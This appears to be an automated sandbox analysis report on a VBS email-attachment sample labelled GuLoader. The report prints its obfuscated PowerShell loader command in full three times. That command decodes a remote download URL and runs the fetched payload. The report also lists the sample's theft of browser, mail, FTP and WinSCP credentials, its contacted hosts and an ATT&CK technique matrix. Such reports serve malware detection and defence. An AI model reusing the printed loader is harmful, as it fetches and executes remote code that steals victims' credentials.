              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'kalyptras skamsttters incorrodable248 porsesnaps spytslikkeren docious thermocauteries dokumentnavne nynazistens arseniosiderite11 uncomprehendingness unobumbrated bylrnbach sulfovinate sgelngder manhours northerns bnkboremaskiner gangly sorrower farmyardy stofskiftesygdommes kyllingemdres flygtningekatastrofe kalyptras skamsttters incorrodable248 porsesnaps spytslikkeren docious thermocauteries dokumentnavne nynazistens arseniosiderite11 uncomprehendingness unobumbrated bylrnbach sulfovinate sgelngder manhours northerns bnkboremaskiner gangly sorrower farmyardy stofskiftesygdommes kyllingemdres flygtningekatastrofe';if (${host}.currentculture) {$suballocating++;}function stemmetllerens($tegningsfil){$gearskifter=$tegningsfil.length-$suballocating;$cordaitaleannitielt96='substri';$cordaitaleannitielt96+='ng';for( $cordaitalean=2;$cordaitalean -lt $gearskifter;$cordaitalean+=3){$kalyptras+=$tegningsfil.$cordaitaleannitielt96.invoke( $cordaitalean, $suballocating);}$kalyptras;}function pharmacist($unmicaceous){ & ($breakneck) ($unmicaceous);}$banjernes=stemmetllerens 'thmfaounzmii clmulheas / a5fi.,a0 c la(suws.iagnpaddio ,w tspa ,enhotj op1su0h,.a,0.w;go kwpii bnal6 b4,n;co ,yx,e6 e4e.;ds tir gv a: a1ca2s,1.i.ar0mu) r s,gliegicspk aor /i,2 s0p 1ek0ti0.n1az0sk1,e grfuril rreej f eodaxt /sa1an2fa1 .pa0 l ';$forgelser=stemmetllerens 'pou hsk,eelrpl- tageg,lehvno.t h ';$spytslikkeren=stemmetllerens 'auhmatwat op,us w:ko/bi/bedt.rnyi ,vdoepr.sugepobeo pgmilsle d.,hc wom mpr/.au pc b? nel.x epnoob.r btph=dod.koshwsen,albeo da sd a&a,ia,d u=d 1.alunb ._ubmbypskg ,j -,iwsuw.ye rk,ek xaaploo .egrbubmoul .yn.ibrkba3,rms sswcw od,b ,2p.ysvdpe ';$misevaluate=stemmetllerens 'ar> p ';$breakneck=stemmetllerens ',nivietux.o ';$hardbeam='dokumentnavne';$wienerbrdsstang = stemmetllerens 'ale fcm,heuo k .a%isa ap tpefdprafotjoava%sy\sqv eea imen.algee ashost..omd siy,s g jo&sp&gi pnebucsthkaodd s t , ';pharmacist (stemmetllerens ' $ cgoblprofob sauflma:c.u deusamkr,rboiarfbit fstys bi .dtne urs n e sun= p(uncstmfodkl .k/,ecko gr$,hw si .esknb,enorblb brund asexs rt .af.ns gf.)u. ');pharmacist (stemmetllerens 'ch$ egz lf otub.lamal,a:shps.ogarpasnoethsp n famopres,s=,a$,nsnopheyg teus.ulstivrk .k neh rtoea.nra. sst.punlhyishtku(fo$dimdeid,spae evsba rlstu pai t esl) n ');pharmacist (stemmetllerens 'ta[hon ,e.otpr. shiererl.vovi,ocmiep,p iofliren mtvim .alentran,g fe srv,]wa:ma:ers le dc du rn.is,tloy fpcar,aoket.oo ,c aounlc. s =ae p,[egnfoe .t ..fos ,e,ncstu or pi,ntsty,iptrrsuo ftenouncbeo.plpit iy bpraepr]u :fr: tt,alaessl1 b2 w ');$spytslikkeren=$porsesnaps[0];$landbrugsbygningen= (stemmetllerens 'ho$ragstl,uop.bh as l ,: hblaa .dt.esmhunt pt ,e urwanrfe as.e=prnsoesuwsi-vrorebarja.ebacudtva k.sovyrus fta,eaemk..ven ,e ,tcy.c,wbeeblbsuc,nlfeis,efln rt');$landbrugsbygningen+=$udskriftssidernes[1];pharmacist ($landbrugsbygn
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'kalyptras skamsttters incorrodable248 porsesnaps spytslikkeren docious thermocauteries dokumentnavne nynazistens arseniosiderite11 uncomprehendingness unobumbrated bylrnbach sulfovinate sgelngder manhours northerns bnkboremaskiner gangly sorrower farmyardy stofskiftesygdommes kyllingemdres flygtningekatastrofe kalyptras skamsttters incorrodable248 porsesnaps spytslikkeren docious thermocauteries dokumentnavne nynazistens arseniosiderite11 uncomprehendingness unobumbrated bylrnbach sulfovinate sgelngder manhours northerns bnkboremaskiner gangly sorrower farmyardy stofskiftesygdommes kyllingemdres flygtningekatastrofe';if (${host}.currentculture) {$suballocating++;}function stemmetllerens($tegningsfil){$gearskifter=$tegningsfil.length-$suballocating;$cordaitaleannitielt96='substri';$cordaitaleannitielt96+='ng';for( $cordaitalean=2;$cordaitalean -lt $gearskifter;$cordaitalean+=3){$kalyptras+=$tegningsfil.$cordaitaleannitielt96.invoke( $cordaitalean, $suballocating);}$kalyptras;}function pharmacist($unmicaceous){ & ($breakneck) ($unmicaceous);}$banjernes=stemmetllerens 'thmfaounzmii clmulheas / a5fi.,a0 c la(suws.iagnpaddio ,w tspa ,enhotj op1su0h,.a,0.w;go kwpii bnal6 b4,n;co ,yx,e6 e4e.;ds tir gv a: a1ca2s,1.i.ar0mu) r s,gliegicspk aor /i,2 s0p 1ek0ti0.n1az0sk1,e grfuril rreej f eodaxt /sa1an2fa1 .pa0 l ';$forgelser=stemmetllerens 'pou hsk,eelrpl- tageg,lehvno.t h ';$spytslikkeren=stemmetllerens 'auhmatwat op,us w:ko/bi/bedt.rnyi ,vdoepr.sugepobeo pgmilsle d.,hc wom mpr/.au pc b? nel.x epnoob.r btph=dod.koshwsen,albeo da sd a&a,ia,d u=d 1.alunb ._ubmbypskg ,j -,iwsuw.ye rk,ek xaaploo .egrbubmoul .yn.ibrkba3,rms sswcw od,b ,2p.ysvdpe ';$misevaluate=stemmetllerens 'ar> p ';$breakneck=stemmetllerens ',nivietux.o ';$hardbeam='dokumentnavne';$wienerbrdsstang = stemmetllerens 'ale fcm,heuo k .a%isa ap tpefdprafotjoava%sy\sqv eea imen.algee ashost..omd siy,s g jo&sp&gi pnebucsthkaodd s t , ';pharmacist (stemmetllerens ' $ cgoblprofob sauflma:c.u deusamkr,rboiarfbit fstys bi .dtne urs n e sun= p(uncstmfodkl .k/,ecko gr$,hw si .esknb,enorblb brund asexs rt .af.ns gf.)u. ');pharmacist (stemmetllerens 'ch$ egz lf otub.lamal,a:shps.ogarpasnoethsp n famopres,s=,a$,nsnopheyg teus.ulstivrk .k neh rtoea.nra. sst.punlhyishtku(fo$dimdeid,spae evsba rlstu pai t esl) n ');pharmacist (stemmetllerens 'ta[hon ,e.otpr. shiererl.vovi,ocmiep,p iofliren mtvim .alentran,g fe srv,]wa:ma:ers le dc du rn.is,tloy fpcar,aoket.oo ,c aounlc. s =ae p,[egnfoe .t ..fos ,e,ncstu or pi,ntsty,iptrrsuo ftenouncbeo.plpit iy bpraepr]u :fr: tt,alaessl1 b2 w ');$spytslikkeren=$porsesnaps[0];$landbrugsbygningen= (stemmetllerens 'ho$ragstl,uop.bh as l ,: hblaa .dt.esmhunt pt ,e urwanrfe as.e=prnsoesuwsi-vrorebarja.ebacudtva k.sovyrus fta,eaemk..ven ,e ,tcy.c,wbeeblbsuc,nlfeis,efln rt');$landbrugsbygningen+=$udskriftssidernes[1];pharmacist ($landbrugsbygn
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'kalyptras skamsttters incorrodable248 porsesnaps spytslikkeren docious thermocauteries dokumentnavne nynazistens arseniosiderite11 uncomprehendingness unobumbrated bylrnbach sulfovinate sgelngder manhours northerns bnkboremaskiner gangly sorrower farmyardy stofskiftesygdommes kyllingemdres flygtningekatastrofe kalyptras skamsttters incorrodable248 porsesnaps spytslikkeren docious thermocauteries dokumentnavne nynazistens arseniosiderite11 uncomprehendingness unobumbrated bylrnbach sulfovinate sgelngder manhours northerns bnkboremaskiner gangly sorrower farmyardy stofskiftesygdommes kyllingemdres flygtningekatastrofe';if (${host}.currentculture) {$suballocating++;}function stemmetllerens($tegningsfil){$gearskifter=$tegningsfil.length-$suballocating;$cordaitaleannitielt96='substri';$cordaitaleannitielt96+='ng';for( $cordaitalean=2;$cordaitalean -lt $gearskifter;$cordaitalean+=3){$kalyptras+=$tegningsfil.$cordaitaleannitielt96.invoke( $cordaitalean, $suballocating);}$kalyptras;}function pharmacist($unmicaceous){ & ($breakneck) ($unmicaceous);}$banjernes=stemmetllerens 'thmfaounzmii clmulheas / a5fi.,a0 c la(suws.iagnpaddio ,w tspa ,enhotj op1su0h,.a,0.w;go kwpii bnal6 b4,n;co ,yx,e6 e4e.;ds tir gv a: a1ca2s,1.i.ar0mu) r s,gliegicspk aor /i,2 s0p 1ek0ti0.n1az0sk1,e grfuril rreej f eodaxt /sa1an2fa1 .pa0 l ';$forgelser=stemmetllerens 'pou hsk,eelrpl- tageg,lehvno.t h ';$spytslikkeren=stemmetllerens 'auhmatwat op,us w:ko/bi/bedt.rnyi ,vdoepr.sugepobeo pgmilsle d.,hc wom mpr/.au pc b? nel.x epnoob.r btph=dod.koshwsen,albeo da sd a&a,ia,d u=d 1.alunb ._ubmbypskg ,j -,iwsuw.ye rk,ek xaaploo .egrbubmoul .yn.ibrkba3,rms sswcw od,b ,2p.ysvdpe ';$misevaluate=stemmetllerens 'ar> p ';$breakneck=stemmetllerens ',nivietux.o ';$hardbeam='dokumentnavne';$wienerbrdsstang = stemmetllerens 'ale fcm,heuo k .a%isa ap tpefdprafotjoava%sy\sqv eea imen.algee ashost..omd siy,s g jo&sp&gi pnebucsthkaodd s t , ';pharmacist (stemmetllerens ' $ cgoblprofob sauflma:c.u deusamkr,rboiarfbit fstys bi .dtne urs n e sun= p(uncstmfodkl .k/,ecko gr$,hw si .esknb,enorblb brund asexs rt .af.ns gf.)u. ');pharmacist (stemmetllerens 'ch$ egz lf otub.lamal,a:shps.ogarpasnoethsp n famopres,s=,a$,nsnopheyg teus.ulstivrk .k neh rtoea.nra. sst.punlhyishtku(fo$dimdeid,spae evsba rlstu pai t esl) n ');pharmacist (stemmetllerens 'ta[hon ,e.otpr. shiererl.vovi,ocmiep,p iofliren mtvim .alentran,g fe srv,]wa:ma:ers le dc du rn.is,tloy fpcar,aoket.oo ,c aounlc. s =ae p,[egnfoe .t ..fos ,e,ncstu or pi,ntsty,iptrrsuo ftenouncbeo.plpit iy bpraepr]u :fr: tt,alaessl1 b2 w ');$spytslikkeren=$porsesnaps[0];$landbrugsbygningen= (stemmetllerens 'ho$ragstl,uop.bh as l ,: hblaa .dt.esmhunt pt ,e urwanrfe as.e=prnsoesuwsi-vrorebarja.ebacudtva k.sovyrus fta,eaemk..ven ,e ,tcy.c,wbeeblbsuc,nlfeis,efln rt');$landbrugsbygningen+=$udskriftssidernes[1];pharmacist ($landbrugsbygnJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exeCode function: 24_2_00163675 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,24_2_00163675
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000016.00000002.3758847608.000000002303A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.3758847608.000000002300F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.3758847608.0000000022FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 3736, type: MEMORYSTR
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: Yara matchFile source: 00000016.00000002.3758847608.0000000022FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000016.00000002.3758847608.000000002303A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.3758847608.000000002300F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.3758847608.0000000022FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: wab.exe PID: 3736, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information121
              Scripting
              Valid Accounts121
              Windows Management Instrumentation
              121
              Scripting
              1
              DLL Side-Loading
              1
              Disable or Modify Tools
              2
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services1
              Archive Collected Data
              1
              Ingress Tool Transfer
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Exploitation for Client Execution
              1
              DLL Side-Loading
              111
              Process Injection
              1
              Deobfuscate/Decode Files or Information
              1
              Credentials in Registry
              1
              File and Directory Discovery
              Remote Desktop Protocol2
              Data from Local System
              11
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts212
              Command and Scripting Interpreter
              1
              Registry Run Keys / Startup Folder
              1
              Registry Run Keys / Startup Folder
              2
              Obfuscated Files or Information
              Security Account Manager125
              System Information Discovery
              SMB/Windows Admin Shares1
              Email Collection
              1
              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell
              Login HookLogin Hook1
              Software Packing
              NTDS1
              Query Registry
              Distributed Component Object ModelInput Capture2
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Timestomp
              LSA Secrets331
              Security Software Discovery
              SSHKeylogging23
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials1
              Process Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Masquerading
              DCSync251
              Virtualization/Sandbox Evasion
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job251
              Virtualization/Sandbox Evasion
              Proc Filesystem1
              Application Window Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
              Process Injection
              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
              Hidden Files and Directories
              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
              Rundll32
              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1466650 Sample: Zapytanie ofertowe (GASTRON... Startdate: 03/07/2024 Architecture: WINDOWS Score: 100 38 mail.fiszebrandt.pl 2->38 40 fiszebrandt.pl 2->40 42 2 other IPs or domains 2->42 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 Multi AV Scanner detection for submitted file 2->54 56 7 other signatures 2->56 9 wscript.exe 2->9         started        12 fMNDB.exe 1 2->12         started        14 fMNDB.exe 3 1 2->14         started        16 rundll32.exe 2->16         started        signatures3 process4 signatures5 72 Suspicious powershell command line found 9->72 74 Wscript starts Powershell (via cmd or directly) 9->74 76 Obfuscated command line found 9->76 78 2 other signatures 9->78 18 powershell.exe 14 19 9->18         started        process6 dnsIp7 44 drive.google.com 142.250.185.174, 443, 49706, 49708 GOOGLEUS United States 18->44 46 drive.usercontent.google.com 142.250.74.193, 443, 49707, 49709 GOOGLEUS United States 18->46 58 Suspicious powershell command line found 18->58 60 Obfuscated command line found 18->60 62 Very long command line found 18->62 64 Found suspicious powershell code related to unpacking or dynamic code loading 18->64 22 powershell.exe 17 18->22         started        25 conhost.exe 18->25         started        27 cmd.exe 1 18->27         started        signatures8 process9 signatures10 66 Writes to foreign memory regions 22->66 68 Found suspicious powershell code related to unpacking or dynamic code loading 22->68 70 Hides threads from debuggers 22->70 29 wab.exe 1 10 22->29         started        34 cmd.exe 1 22->34         started        process11 dnsIp12 48 fiszebrandt.pl 195.128.154.10, 49710, 587 PL-SKYTECH-ASPL Poland 29->48 36 C:\Users\user\AppData\Roaming\...\fMNDB.exe, PE32 29->36 dropped 80 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 29->80 82 Tries to steal Mail credentials (via file / registry access) 29->82 84 Tries to harvest and steal ftp login credentials 29->84 86 3 other signatures 29->86 file13 signatures14

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Zapytanie ofertowe (GASTRON 07022024).vbs11%ReversingLabsScript-WScript.Trojan.GuLoader
              Zapytanie ofertowe (GASTRON 07022024).vbs9%VirustotalBrowse
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe0%ReversingLabs
              C:\Users\user\AppData\Roaming\fMNDB\fMNDB.exe0%VirustotalBrowse
              No Antivirus matches
              SourceDetectionScannerLabelLink
              fiszebrandt.pl0%VirustotalBrowse
              drive.google.com0%VirustotalBrowse
              drive.usercontent.google.com1%VirustotalBrowse
              mail.fiszebrandt.pl0%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
              http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://drive.usercontent.googh0%URL Reputationsafe
              https://aka.ms/pscore6lB0%URL Reputationsafe
              http://x1.c.lencr.org/00%URL Reputationsafe
              http://x1.i.lencr.org/00%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              https://apis.google.com0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              https://drive.google.com/y0%Avira URL Cloudsafe
              https://drive.google.com/uc?ex0%Avira URL Cloudsafe
              http://drive.usercontent.google.com0%Avira URL Cloudsafe
              https://drive.goog0%Avira URL Cloudsafe
